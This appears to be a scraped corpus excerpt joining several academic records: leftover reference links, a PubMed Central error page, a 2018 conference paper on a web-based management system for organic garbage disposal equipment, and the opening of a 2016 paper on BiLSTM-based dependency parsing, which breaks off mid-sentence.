Nucleic Acids Research 44(D1):D710–D716 DOI 10.1093/nar/gkv1157. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 16/16 https://peerj.com http://dx.doi.org/10.1073/pnas.0409137102 http://dx.doi.org/10.1093/nar/gkt1065 http://dx.doi.org/10.1093/bioinformatics/btp651 http://dx.doi.org/10.1093/bioinformatics/bti079 http://dx.doi.org/10.1093/bioinformatics/btg180 http://dx.doi.org/10.1073/pnas.051605998 http://dx.doi.org/10.1093/molbev/msv051 http://dx.doi.org/10.1093/molbev/msm088 http://dx.doi.org/10.1093/molbev/msq303 http://dx.doi.org/10.1093/nar/gkv1157 http://dx.doi.org/10.7717/peerj-cs.118 work_ko6amo5b3jdbdcrcns6rbo2zym ---- wp-p1m-38.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-38.ebi.ac.uk no 265367801 Params is empty 265367801 exception Params is empty 2021/04/06-17:58:17 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265367801 (wp-p1m-38.ebi.ac.uk) Time: 2021/04/06 17:58:17 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_kobewel4rjapzjr65c2suycham ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 135 Organic Garbage Disposal Equipment Management System Based on WSN Liu Bocheng School of Software, Nanchang University Nanchang, China e-mail: jsjjcjx@163.com Cao Ye School of Software, Nanchang University Nanchang, China e-mail: 13767959389@163.com Song Jialei School of Software, Nanchang University Nanchang, China e-mail: ncusc_bysj@163.com Abstract—Huge amount of organic garbage produced by cites with urbanization rapid development. Garbage disposal equipment were put into use in large scale. Traditional measures of equipment management is no more efficient. This paper focuses on realizing informationization and systematization of equipment management through software technology. Keywords-Garbage Disposal; Equipment Management; Ensor; WSN This paper analyzed the requirement of the system and related work process. The system should be able to manage basic information of staff and equipment, receiving data returned from sensors and reminding staff when equipment is abnormal. Staff can set the operation status of equipment via the system. Based on modular programming ideas, then the paper designed the functional modules: personnel management, rights management, equipment management, real-time simulation, task management and fault management. Finally complete the full function of the system, providing the information management way for the management of organic waste equipment, improving the efficiency of the staff and enhancing the modern management level of the enterprise. I. INTRODUCTION The staff can manage the equipment and tasks and monitor the real-time status of the equipment through computer. Therefore, it can improve the efficiency of equipment management, reduce the enterprise's investment in human resources and promote the informatization of management[1]. The concept of informatization is gradually applied to the management of garbage disposal equipment. According to the analysis of the development trend of China's garbage disposal industry, the waste treatment is gradually adopting high technology and the level is getting higher and higher. In the case of waste separation, the application of automatic equipment, landfill site construction and application of bioengineering technology to improve the efficiency of waste incineration power generation system through thermal physical heat transfer technology[2]. The scale of equipment management is increasing and the complexity of management is improving. The traditional way of equipment management gradually does not meet the demand of production. Network technology can effectively integrate resources and realize sharing, which is being applied to equipment management, thus improving operation and management efficiency[3]. II. SYSTEM ANALYSIS A. System demand analysis The main purpose of the system is to improve the management efficiency of waste disposal equipment and realize the network management. The following requirements are summarized by the analysis of the system.  In order to facilitate user operation, it is necessary to provide a good operation interface. The interface design should conform to the basic aesthetics, the system response speed should be fast, and the operation process should be standardized and reasonable.  To set different permissions for different personnel roles so as to maintain the system security and run steadily.  It will be able to manage user information, such as adding, deleting and modifying user information.  It will be able to manage the basic information of the equipment, such as adding, deleting and modifying basic information of the equipment.  The operator can carry out task management, add tasks according to the arrangement, and can generate task reports and submit them to the administrator for review.  The operator can through the system to run the equipment parameters settings, such as equipment internal temperature, the humidity inside the equipment, power equipment, etc., so that the equipment will be in good running condition.  The operator can check the operation of the system in real time and monitor the equipment. mailto:jsjjcjx@163.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 136  In the case of equipment failure, the system can notify operators in different ways, such as sending text messages, page pop-up prompts, etc. B. System function analysis 1) User management User can check their personal information and change their passwords. The administrator can manage user information after login, such as adding, deleting, modifying user information and modifying users' permission. 2) Task management Administrators distribute tasks by the system, distribute them to executives, and review the submitted tasks. The task performer modifies the status of the task according to the progress of the task, and then submits the task or gives it to the next performer. 3) Equipment management The operator can manage the basic information by the system, such as add, delete, modify the basic information of the equipment, and can view the equipment operation manual, at the same time they can intuitively see location of the equipment through the map. 4) Device control The operator changes the operating parameters of the equipment, such as internal temperature, internal humidity and machine power, so as to control the operation state of the equipment and improve the operation efficiency of the equipment. 5) Real-time monitoring The operator can monitor the machine and check the running status of the machine in real time. 6) Fault management System can detect the abnormality of the device and notify the operator via SMS or webpage reminder, and the fault information will be added to the fault log. III. SYSTEM DESIGN A. Overall system design The overall design of the system is to carry out the overall plan for the previous analysis, and provide concrete solutions for the realization of the system. The organic waste recycling operation management system not only needs real- time monitoring of the equipment, but also can manage the equipment and improve the working efficiency of the users. According to business function, business process, we design corresponding function and business logic design. And by analyzing the data and entity types involved in the system, the design of the database will be completed. B. System architecture The architecture of the software system is as follows. Figure 1. System architecture View layer handles the interface presentation and user interaction. Business layer handles the request sent by the user and returns the result of the request to the view layer. At the same time, you will get the data needed by the view layer by calling the persistence layer's mapper interface. Persistence layer connects to the database, and the data will be processed by the mapper interface. C. System function design Through the business analysis of the system, the system function is divided into the following contents according to the module. Figure 2. Function module The functions of each module are as follows： 1) User permission management Different users have different executable rights, and from the business logic, it needs to set different roles for different users, which is conducive to the system's safe and stable operation. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 137 2) User information management Manage user information, including add, delete, modify, and other basic operations. 3) Personal information view View all personal information and be able to change the password. 4) Equipment information management Management equipment information, including adding, modifying, and deleting equipment information and other basic operations. 5) Equipment location view Display the corresponding location on the map according to the device address. 6) Device running state setting. The user sets the internal humidity, temperature and power of the device during operation, thus making the device in a high efficient state of processing. 7) Single device monitoring Simulates the data sent by the sensor and monitors the state of a single device in real time. The state parameters include the internal temperature of the device, the internal humidity of the equipment and the power of the equipment. 8) District profile Carry out statistical analysis of equipment quantity information in the area. 9) Warning prompt sending When the temperature, humidity or power of the device exceeds the threshold, the system will send a warning to the device owner via text message or the page pop-up box. 10) Fault information record When the device fails, the system records the specific fault information. The user needs to modify the status of the fault according to the fault. 11) Assignment of tasks The administrator arranges specific tasks through the system and pushes them to the executor. 12) Task management The user can update the status of the task in real time according to the task. When the task is completed, it can be submitted to the administrator for review or continued to be pushed to the next executor. Ordinary users manage their own tasks, and administrators can manage all tasks. IV. SYSTEM IMPLEMENTATION A. Holistic structure The system is managed by maven,and the required reference packages are placed in the pom.xml.First,we deploy the package structure according to the system function. The functions of each package are as follows.  Com.ssm.controller contains the related classes of the Spring controller.  Com.ssm.entity contains the entity types associated with the project.  Com.ssm.mapper contains the relevant interface files and corresponding XML files for the operation database.  Com.ssm.service contains the Service Interface associated with Spring.  Com.ssm.serviceImpl is the implementation of the interface in com.ssm. service.  The mybatis package contains the configuration file sqlmapconfig.xml for mybatis.  Spring packages contains spring-related configuration files, including the database configuration management file applicationcontext- dao.xml and view management configuration file springmvc.xml and spring security configuration file applicationcontent-security.xml.  Db.properties is the connection profile for the database.。  Log4j.properties is the configuration file for the output log.  Src/main/webapp contains the JSP pages and the imported JavaScript files. B. Function implementation 1) Login inplementation Input user name and password, the corresponding form will be submitted to the information to the spring security processing, if the information from Spring security that match in the database information , it will be send to the corresponding user requests, load the corresponding menu resources, access to the system home page url. If it does not match to the corresponding information, redirect to the login page. Spring security needs to implement this functionality, in addition to implementing the corresponding configuration in applications-security.xml. 2) Equipment management information User can view the information of the device, add, modify, delete, search, and export the required information to excel. After clicking the location button, the user can view the location of the device. The map uses Baidu Map interface to realize, click the geographical position button and then the location of the device and the device number information will be displayed on the map. 3) Employee management User can view the basic information of the employee and add, delete or find there information. You can also set the users’ role. And you can select the columns you want to export to an Excel. The Table uses bootstrap Table to dynamically load employee information. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 138 4) District profile Click the district profile button, the map of the country will be displayed, and the depth of the color will be directly proportional to the number of devices. This part is mainly showing the distribution of the equipment from different regions of the country, it uses Echarts to implement, and complete the drill down function of secondary map, click each province will enter the corresponding city’s information interface, each city’s information using a scatter diagram showing the number of devices. When the mouse is hovering over the provinces, the relevant devices amount will be prompted. 5) LAN monitoring User can check the temperature, humidity and power of the device, and the warning threshold, and modify or delete information of the device. Click on the status button to view the real-time state of the device, and the real-time state data is simulated using the random number. The dynamic line chart is realized by Echarts. The temperature, humidity and power data of the device will be transmitted to controller in real-time. If any abnormal data is found, the device will send SMS messages to the equipment manager. SMS prompts use the SMS interface provided by the Internet provider. 6) Task list Users can categorize tasks according to the urgency of the task, and can delete task information and manage the tasks. 7) Fault log When a device fails, the system generates a fault log. User can check the fault information of the device and solve the state of the fault. V. CONCLUSION The organic garbage disposal equipment management system achieves multiple functions such as the rights management, user management, equipment management, equipment monitoring, fault management and early warning, task management, and provides reference for garbage disposal equipment information management. The system generally operates normally and smoothly. Graphical interactive interface is pleasing to the eye. It can respond quickly to various operations like addition, deletion, search etc. It can effectively improve the management efficiency of the equipment, optimize the business process, reduce the investment in management, and improve the modern management level of the enterprise. There are some deficiencies in the system, which need further improvement: (1) The real-time monitoring part of the equipment uses the simulation data. In practice, it needs to receive the data sent back by the sensor. The integration will be realized in the follow-up work. (2) When the number of devices is huge, the query speed of the system will be reduced. Optimization of the query algorithm is needed to improve the response speed of the system. (3) The regional general situation only counts the number of devices in different regions, and it could analyze more factors, such as equipment model, abnormal equipment, etc. REFERENCES [1] Chi Xun,Wang Baojie,Study on Composting Treatment Pattern of Rural Living OrganicWaste,Journal of Shandong Agricultural University. Natural Science,china,vol.48,pp.749-751,2017 [2] Hu Shang-qin,Hu Guo,Research on producing the alcohol from the organic garbage fermentation,1st International Conference on Energy and Environmental Protection (ICEEP 2012),Advanced Materials Research vol. 512,pp. 455-458,2012 [3] ZHANG Xilin,Study on the Garbage Disposal in Urban Park Based on the Circulation Ecoomy Theory,Journal of Anhui Agricultural Sciences vol.35 pp. 817-818,822,2007 work_kq5iakcovbdnjclxf3ichyagwy ---- Simple and Accurate Dependency Parsing Using Bidirectional LSTM Feature Representations Eliyahu Kiperwasser Computer Science Department Bar-Ilan University Ramat-Gan, Israel elikip@gmail.com Yoav Goldberg Computer Science Department Bar-Ilan University Ramat-Gan, Israel yoav.goldberg@gmail.com Abstract We present a simple and effective scheme for dependency parsing which is based on bidirectional-LSTMs (BiLSTMs). Each sen- tence token is associated with a BiLSTM vec- tor representing the token in its sentential con- text, and feature vectors are constructed by concatenating a few BiLSTM vectors. The BiLSTM is trained jointly with the parser ob- jective, resulting in very effective feature ex- tractors for parsing. We demonstrate the ef- fectiveness of the approach by applying it to a greedy transition-based parser as well as to a globally optimized graph-based parser. The resulting parsers have very simple architec- tures, and match or surpass the state-of-the-art accuracies on English and Chinese. 1 Introduction The focus of this paper is on feature represen- tation for dependency parsing, using recent tech- niques from the neural-networks (“deep learning”) literature. Modern approaches to dependency pars- ing can be broadly categorized into graph-based and transition-based parsers (Kübler et al., 2009). Graph-based parsers (McDonald, 2006) treat pars- ing as a search-based structured prediction prob- lem in which the goal is learning a scoring func- tion over dependency trees such that the correct tree is scored above all other trees. Transition-based parsers (Nivre, 2004; Nivre, 2008) treat parsing as a sequence of actions that produce a parse tree, and a classifier is trained to score the possible actions at each stage of the process and guide the parsing pro- cess. Perhaps the simplest graph-based parsers are arc-factored (first order) models (McDonald, 2006), in which the scoring function for a tree decomposes over the individual arcs of the tree. More elaborate models look at larger (overlapping) parts, requiring more sophisticated inference and training algorithms (Martins et al., 2009; Koo and Collins, 2010). The basic transition-based parsers work in a greedy man- ner, performing a series of locally-optimal decisions, and boast very fast parsing speeds. More advanced transition-based parsers introduce some search into the process using a beam (Zhang and Clark, 2008) or dynamic programming (Huang and Sagae, 2010). Regardless of the details of the parsing frame- work being used, a crucial step in parser design is choosing the right feature function for the underly- ing statistical model. Recent work (see Section 2.2 for an overview) attempt to alleviate parts of the fea- ture function design problem by moving from lin- ear to non-linear models, enabling the modeler to focus on a small set of “core” features and leav- ing it up to the machine-learning machinery to come up with good feature combinations (Chen and Man- ning, 2014; Pei et al., 2015; Lei et al., 2014; Taub- Tabib et al., 2015). However, the need to carefully define a set of core features remains. For exam- ple, the work of Chen and Manning (2014) uses 18 different elements in its feature function, while the work of Pei et al. (2015) uses 21 different elements. Other works, notably Dyer et al. (2015) and Le and Zuidema (2014), propose more sophisticated feature representations, in which the feature engineering is replaced with architecture engineering. In this work, we suggest an approach which is much simpler in terms of both feature engineering 313 Transactions of the Association for Computational Linguistics, vol. 4, pp. 313–327, 2016. Action Editor: Marco Kuhlmann. Submission batch: 2/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. and architecture engineering. Our proposal (Section 3) is centered around BiRNNs (Irsoy and Cardie, 2014; Schuster and Paliwal, 1997), and more specif- ically BiLSTMs (Graves, 2008), which are strong and trainable sequence models (see Section 2.3). The BiLSTM excels at representing elements in a sequence (i.e., words) together with their contexts, capturing the element and an “infinite” window around it. We represent each word by its BiLSTM encoding, and use a concatenation of a minimal set of such BiLSTM encodings as our feature function, which is then passed to a non-linear scoring function (multi-layer perceptron). Crucially, the BiLSTM is trained with the rest of the parser in order to learn a good feature representation for the parsing prob- lem. If we set aside the inherent complexity of the BiLSTM itself and treat it as a black box, our pro- posal results in a pleasingly simple feature extractor. We demonstrate the effectiveness of the approach by using the BiLSTM feature extractor in two pars- ing architectures, transition-based (Section 4) as well as a graph-based (Section 5). In the graph- based parser, we jointly train a structured-prediction model on top of a BiLSTM, propagating errors from the structured objective all the way back to the BiLSTM feature-encoder. To the best of our knowl- edge, we are the first to perform such end-to-end training of a structured prediction model and a recur- rent feature extractor for non-sequential outputs.1 Aside from the novelty of the BiLSTM feature extractor and the end-to-end structured training, we rely on existing models and techniques from the parsing and structured prediction literature. We stick to the simplest parsers in each category – greedy inference for the transition-based architec- ture, and a first-order, arc-factored model for the graph-based architecture. Despite the simplicity of the parsing architectures and the feature func- tions, we achieve near state-of-the-art parsing ac- curacies in both English (93.1 UAS) and Chinese (86.6 UAS), using a first-order parser with two fea- tures and while training solely on Treebank data, without relying on semi-supervised signals such as pre-trained word embeddings (Chen and Manning, 2014), word-clusters (Koo et al., 2008), or tech- 1Structured training of sequence tagging models over RNN- based representations was explored by Chiu and Nichols (2016) and Lample et al. (2016). niques such as tri-training (Weiss et al., 2015). When also including pre-trained word embeddings, we obtain further improvements, with accuracies of 93.9 UAS (English) and 87.6 UAS (Chinese) for a greedy transition-based parser with 11 features, and 93.6 UAS (En) / 87.4 (Ch) for a greedy transition- based parser with 4 features. 2 Background and Notation Notation We use x1:n to denote a sequence of n vectors x1, · · · ,xn. Fθ(·) is a function parameter- ized with parameters θ. We write FL(·) as shorthand for FθL – an instantiation of F with a specific set of parameters θL. We use ◦ to denote a vector con- catenation operation, and v[i] to denote an indexing operation taking the ith element of a vector v. 2.1 Feature Functions in Dependency Parsing Traditionally, state-of-the-art parsers rely on linear models over hand-crafted feature functions. The fea- ture functions look at core components (e.g. “word on top of stack”, “leftmost child of the second-to- top word on the stack”, “distance between the head and the modifier words”), and are comprised of sev- eral templates, where each template instantiates a bi- nary indicator function over a conjunction of core elements (resulting in features of the form “word on top of stack is X and leftmost child is Y and . . . ”). The design of the feature function – which compo- nents to consider and which combinations of com- ponents to include – is a major challenge in parser design. Once a good feature function is proposed in a paper it is usually adopted in later works, and sometimes tweaked to improve performance. Ex- amples of good feature functions are the feature-set proposed by Zhang and Nivre (2011) for transition- based parsing (including roughly 20 core compo- nents and 72 feature templates), and the feature- set proposed by McDonald et al. (2005) for graph- based parsing, with the paper listing 18 templates for a first-order parser, while the first order feature- extractor in the actual implementation’s code (MST- Parser2) includes roughly a hundred feature tem- plates. 2http://www.seas.upenn.edu/~strctlrn/ MSTParser/MSTParser.html 314 http://www.seas.upenn.edu/~strctlrn/MSTParser/MSTParser.html http://www.seas.upenn.edu/~strctlrn/MSTParser/MSTParser.html The core features in a transition-based parser usu- ally look at information such as the word-identity and part-of-speech (POS) tags of a fixed number of words on top of the stack, a fixed number of words on the top of the buffer, the modifiers (usually left- most and right-most) of items on the stack and on the buffer, the number of modifiers of these elements, parents of words on the stack, and the length of the spans spanned by the words on the stack. The core features of a first-order graph-based parser usually take into account the word and POS of the head and modifier items, as well as POS-tags of the items around the head and modifier, POS tags of items be- tween the head and modifier, and the distance and direction between the head and modifier. 2.2 Related Research Efforts Coming up with a good feature-set for a parser is a hard and time consuming task, and many researchers attempt to reduce the required manual effort. The work of Lei et al. (2014) suggests a low-rank ten- sor representation to automatically find good feature combinations. Taub-Tabib et al. (2015) suggest a kernel-based approach to implicitly consider all pos- sible feature combinations over sets of core-features. The recent popularity of neural networks prompted a move from templates of sparse, binary indicator features to dense core feature encodings fed into non-linear classifiers. Chen and Manning (2014) en- code each core feature of a greedy transition-based parser as a dense low-dimensional vector, and the vectors are then concatenated and fed into a non- linear classifier (multi-layer perceptron) which can potentially capture arbitrary feature combinations. Weiss et al. (2015) showed further gains using the same approach coupled with a somewhat improved set of core features, a more involved network archi- tecture with skip-layers, beam search-decoding, and careful hyper-parameter tuning. Pei et al. (2015) apply a similar methodology to graph-based pars- ing. While the move to neural-network classi- fiers alleviates the need for hand-crafting feature- combinations, the need to carefully define a set of core features remain. For example, the feature rep- resentation in Chen and Manning (2014) is a con- catenation of 18 word vectors, 18 POS vectors and 12 dependency-label vectors.3 The above works tackle the effort in hand-crafting effective feature combinations. A different line of work attacks the feature-engineering problem by suggesting novel neural-network architectures for encoding the parser state, including intermediately- built subtrees, as vectors which are then fed to non- linear classifiers. Titov and Henderson encode the parser state using incremental sigmoid-belief net- works (2007). In the work of Dyer et al. (2015), the entire stack and buffer of a transition-based parser are encoded as a stack-LSTMs, where each stack el- ement is itself based on a compositional represen- tation of parse trees. Le and Zuidema (2014) en- code each tree node as two compositional represen- tations capturing the inside and outside structures around the node, and feed the representations into a reranker. A similar reranking approach, this time based on convolutional neural networks, is taken by Zhu et al. (2015). Finally, in Kiperwasser and Gold- berg (2016) we present an Easy-First parser based on a novel hierarchical-LSTM tree encoding. In contrast to these, the approach we present in this work results in much simpler feature functions, without resorting to elaborate network architectures or compositional tree representations. Work by Vinyals et al. (2015) employs a sequence-to-sequence with attention architecture for constituency parsing. Each token in the input sen- tence is encoded in a deep-BiLSTM representation, and then the tokens are fed as input to a deep- LSTM that predicts a sequence of bracketing ac- tions based on the already predicted bracketing as well as the encoded BiLSTM vectors. A trainable attention mechanism is used to guide the parser to relevant BiLSTM vectors at each stage. This ar- chitecture shares with ours the use of BiLSTM en- coding and end-to-end training. The sequence of bracketing actions can be interpreted as a sequence of Shift and Reduce operations of a transition-based parser. However, while the parser of Vinyals et al. 3In all of these neural-network based approaches, the vec- tor representations of words were initialized using pre-trained word-embeddings derived from a large corpus external to the training data. This puts the approaches in the semi-supervised category, making it hard to tease apart the contribution of the au- tomatic feature-combination component from that of the semi- supervised component. 315 relies on a trainable attention mechanism for fo- cusing on specific BiLSTM vectors, parsers in the transition-based family we use in Section 4 use a hu- man designed stack and buffer mechanism to manu- ally direct the parser’s attention. While the effec- tiveness of the trainable attention approach is im- pressive, the stack-and-buffer guidance of transition- based parsers results in more robust learning. In- deed, work by Cross and Huang (2016), published while working on the camera-ready version of this paper, show that the same methodology as ours is highly effective also for greedy, transition-based constituency parsing, surpassing the beam-based ar- chitecture of Vinyals et al. (88.3F vs. 89.8F points) when trained on the Penn Treebank dataset and with- out using orthogonal methods such as ensembling and up-training. 2.3 Bidirectional Recurrent Neural Networks Recurrent neural networks (RNNs) are statistical learners for modeling sequential data. An RNN al- lows one to model the ith element in the sequence based on the past – the elements x1:i up to and in- cluding it. The RNN model provides a framework for conditioning on the entire history x1:i without resorting to the Markov assumption which is tradi- tionally used for modeling sequences. RNNs were shown to be capable of learning to count, as well as to model line lengths and complex phenomena such as bracketing and code indentation (Karpathy et al., 2015). Our proposed feature extractors are based on a bidirectional recurrent neural network (BiRNN), an extension of RNNs that take into account both the past x1:i and the future xi:n. We use a specific flavor of RNN called a long short-term memory network (LSTM). For brevity, we treat RNN as an abstrac- tion, without getting into the mathematical details of the implementation of the RNNs and LSTMs. For further details on RNNs and LSTMs, the reader is referred to Goldberg (2015) and Cho (2015). The recurrent neural network (RNN) abstraction is a parameterized function RNNθ(x1:n) mapping a sequence of n input vectors x1:n, xi ∈ Rdin to a se- quence of n output vectors h1:n,hi ∈ Rdout . Each output vector hi is conditioned on all the input vec- tors x1:i, and can be thought of as a summary of the prefix x1:i of x1:n. In our notation, we ignore the intermediate vectors h1:n−1 and take the output of RNNθ(x1:n) to be the vector hn. A bidirectional RNN is composed of two RNNs, RNNF and RNNR, one reading the sequence in its regular order, and the other reading it in reverse. Concretely, given a sequence of vectors x1:n and a desired index i, the function BIRNNθ(x1:n, i) is de- fined as: BIRNNθ(x1:n, i) = RNNF (x1:i)◦ RNNR(xn:i) The vector vi = BIRNN(x1:n, i) is then a represen- tation of the ith item in x1:n, taking into account both the entire history x1:i and the entire future xi:n by concatenating the matching RNNs. We can view the BiRNN encoding of an item i as representing the item i together with a context of an infinite window around it. Computational Complexity Computing the BiRNN vectors encoding of the ith element of a sequence x1:n requires O(n) time for computing the two RNNs and concatenating their outputs. A naive approach of computing the bidirectional representation of all n elements result in O(n2) computation. However, it is trivial to compute the BiRNN encoding of all sequence items in linear time by pre-computing RNNF (x1:n) and RNNR(xn:1), keeping the intermediate representa- tions, and concatenating the required elements as needed. BiRNN Training Initially, the BiRNN encodings vi do not capture any particular information. During training, the encoded vectors vi are fed into further network layers, until at some point a prediction is made, and a loss is incurred. The back-propagation algorithm is used to compute the gradients of all the parameters in the network (including the BiRNN pa- rameters) with respect to the loss, and an optimizer is used to update the parameters according to the gradients. The training procedure causes the BiRNN function to extract from the input sequence x1:n the relevant information for the task task at hand. Going deeper We use a variant of deep bidirectional RNN (or k-layer BiRNN) which is composed of k BiRNN functions BIRNN1, · · · , BIRNNk that feed into each other: the output BIRNN`(x1:n,1), . . . , BIRNN`(x1:n,n) of BIRNN` becomes the input of BIRNN`+1. Stacking 316 BiRNNs in this way has been empirically shown to be effective (Irsoy and Cardie, 2014). In this work, we use BiRNNs and deep-BiRNNs interchangeably, specifying the number of layers when needed. Historical Notes RNNs were introduced by El- man (1990), and extended to BiRNNs by Schus- ter and Paliwal (1997). The LSTM variant of RNNs is due to Hochreiter and Schmidhuber (1997). BiLSTMs were recently popularized by Graves (2008), and deep BiRNNs were introduced to NLP by Irsoy and Cardie (2014), who used them for se- quence tagging. In the context of parsing, Lewis et al. (2016) and Vaswani et al. (2016) use a BiLSTM sequence tagging model to assign a CCG supertag for each token in the sentence. Lewis et al. (2016) feeds the resulting supertags sequence into an A* CCG parser. Vaswani et al. (2016) adds an addi- tional layer of LSTM which receives the BiLSTM representation together with the k-best supertags for each word and outputs the most likely supertag given previous tags, and then feeds the predicted su- pertags to a discriminitively trained parser. In both works, the BiLSTM is trained to produce accurate CCG supertags, and is not aware of the global pars- ing objective. 3 Our Approach We propose to replace the hand-crafted feature func- tions in favor of minimally-defined feature functions which make use of automatically learned Bidirec- tional LSTM representations. Given n-words input sentence s with words w1, . . . ,wn together with the corresponding POS tags t1, . . . , tn,4 we associate each word wi and POS ti with embedding vectors e(wi) and e(ti), and cre- ate a sequence of input vectors x1:n in which each xi is a concatenation of the corresponding word and POS vectors: xi = e(wi)◦e(pi) The embeddings are trained together with the model. This encodes each word in isolation, disregarding its context. We introduce context by representing each 4 In this work the tag sequence is assumed to be given, and in practice is predicted by an external model. Future work will address relaxing this assumption. input element as its (deep) BiLSTM vector, vi: vi = BILSTM(x1:n, i) Our feature function φ is then a concatenation of a small number of BiLSTM vectors. The exact fea- ture function is parser dependent and will be dis- cussed when discussing the corresponding parsers. The resulting feature vectors are then scored using a non-linear function, namely a multi-layer perceptron with one hidden layer (MLP): MLPθ(x) = W 2 · tanh(W1 ·x + b1) + b2 where θ = {W1,W2,b1,b2} are the model parame- ters. Beside using the BiLSTM-based feature func- tions, we make use of standard parsing techniques. Crucially, the BiLSTM is trained jointly with the rest of the parsing objective. This allows it to learn rep- resentations which are suitable for the parsing task. Consider a concatenation of two BiLSTM vectors (vi ◦vj) scored using an MLP. The scoring function has access to the words and POS-tags of vi and vj, as well as the words and POS-tags of the words in an infinite window surrounding them. As LSTMs are known to capture length and sequence position in- formation, it is very plausible that the scoring func- tion can be sensitive also to the distance between i and j, their ordering, and the sequential material be- tween them. Parsing-time Complexity Once the BiLSTM is trained, parsing is performed by first computing the BiLSTM encoding vi for each word in the sentence (a linear time operation).5 Then, parsing proceeds as usual, where the feature extraction involves a con- catenation of a small number of the pre-computed vi vectors. 4 Transition-based Parser We begin by integrating the feature extractor in a transition-based parser (Nivre, 2008). We follow the notation in Goldberg and Nivre (2013). The 5 While the BiLSTM computation is quite efficient as it is, as demonstrated by Lewis et al. (2016), if using a GPU imple- mentation the BiLSTM encoding can be efficiently performed over many of sentences in parallel, making its computation cost almost negligible. 317 the s2 jumped s1 over s0 the b0 lazy b1 dog b2 ROOT b3 fox brown Configuration: Scoring: LSTMf xthe concat LSTMf xbrown concat LSTMf xfox concat LSTMf xjumped concat LSTMf xover concat LSTMf xthe concat LSTMf xlazy concat LSTMf xdog concat LSTMf xROOT concat LSTMb s0 LSTMb s1 LSTMb s2 LSTMb s3 LSTMb s4 LSTMb s5 LSTMb s6 LSTMb s7 LSTMb s8 Vthe Vbrown Vfox Vjumped Vover Vthe Vlazy Vdog VROOT MLP (ScoreLeftArc,ScoreRightArc,ScoreShift) Figure 1: Illustration of the neural model scheme of the transition-based parser when calculating the scores of the possible transitions in a given configuration. The configuration (stack and buffer) is depicted on the top. Each transition is scored using an MLP that is fed the BiLSTM encodings of the first word in the buffer and the three words at the top of the stack (the colors of the words correspond to colors of the MLP inputs above), and a transition is picked greedily. Each xi is a concatenation of a word and a POS vector, and possibly an additional external embedding vector for the word. The figure depicts a single-layer BiLSTM, while in practice we use two layers. When parsing a sentence, we iteratively compute scores for all possible transitions and apply the best scoring action until the final configuration is reached. transition-based parsing framework assumes a tran- sition system, an abstract machine that processes sentences and produces parse trees. The transition system has a set of configurations and a set of tran- sitions which are applied to configurations. When parsing a sentence, the system is initialized to an ini- tial configuration based on the input sentence, and transitions are repeatedly applied to this configura- tion. After a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. In a greedy parser, a classifier is used to choose the transition to take in each configuration, based on features ex- tracted from the configuration itself. The parsing al- gorithm is presented in Algorithm 1 below. Given a sentence s, the parser is initialized with the configuration c (line 2). Then, a feature func- tion φ(c) represents the configuration c as a vector, which is fed to a scoring function SCORE assign- ing scores to (configuration,transition) pairs. SCORE Algorithm 1 Greedy transition-based parsing 1: Input: sentence s = w1, . . . ,xw, t1, . . . , tn, parameterized function SCOREθ(·) with param- eters θ. 2: c ← INITIAL(s) 3: while not TERMINAL(c) do 4: t̂ ← arg maxt∈LEGAL(c) SCOREθ ( φ(c), t ) 5: c ← t̂(c) 6: return tree(c) scores the possible transitions t, and the highest scoring transition t̂ is chosen (line 4). The transition t̂ is applied to the configuration, resulting in a new parser configuration. The process ends when reach- ing a final configuration, from which the resulting parse tree is read and returned (line 6). Transition systems differ by the way they define configurations, and by the particular set of transi- tions available to them. A parser is determined by 318 the choice of a transition system, a feature function φ and a scoring function SCORE. Our choices are detailed below. The Arc-Hybrid System Many transition systems exist in the literature. In this work, we use the arc- hybrid transition system (Kuhlmann et al., 2011), which is similar to the more popular arc-standard system (Nivre, 2004), but for which an efficient dy- namic oracle is available (Goldberg and Nivre, 2012; Goldberg and Nivre, 2013). In the arc-hybrid sys- tem, a configuration c = (σ,β,T) consists of a stack σ, a buffer β, and a set T of dependency arcs. Both the stack and the buffer hold integer indices pointing to sentence elements. Given a sentence s = w1, . . . ,wn, t1, . . . , tn, the system is initial- ized with an empty stack, an empty arc set, and β = 1, . . . ,n,ROOT , where ROOT is the special root index. Any configuration c with an empty stack and a buffer containing only ROOT is terminal, and the parse tree is given by the arc set Tc of c. The arc- hybrid system allows 3 possible transitions, SHIFT, LEFT` and RIGHT`, defined as: SHIFT[(σ, b0|β, T)] = (σ|b0, β, T) LEFT`[(σ|s1|s0, b0|β, T)] = (σ|s1, b0|β, T ∪{(b0,s0,`)}) RIGHT`[(σ|s1|s0, β, T)] = (σ|s1, β, T ∪{(s1,s0,`)}) The SHIFT transition moves the first item of the buffer (b0) to the stack. The LEFT` transition re- moves the first item on top of the stack (s0) and attaches it as a modifier to b0 with label `, adding the arc (b0,s0,`). The RIGHT` transition removes s0 from the stack and attaches it as a modifier to the next item on the stack (s1), adding the arc (s1,s0,`). Scoring Function Traditionally, the scoring func- tion SCOREθ(x,t) is a discriminative linear model of the form SCOREW (x,t) = (W · x)[t]. The lin- earity of SCORE required the feature function φ(·) to encode non-linearities in the form of combination features. We follow Chen and Manning (2014) and replace the linear scoring model with an MLP. SCOREθ(x,t) = MLPθ(x)[t] Simple Feature Function The feature function φ(c) is typically complex (see Section 2.1). Our feature function is the concatenated BiLSTM vec- tors of the top 3 items on the stack and the first item on the buffer. I.e., for a configuration c = (. . . |s2|s1|s0, b0| . . . , T) the feature extractor is defined as: 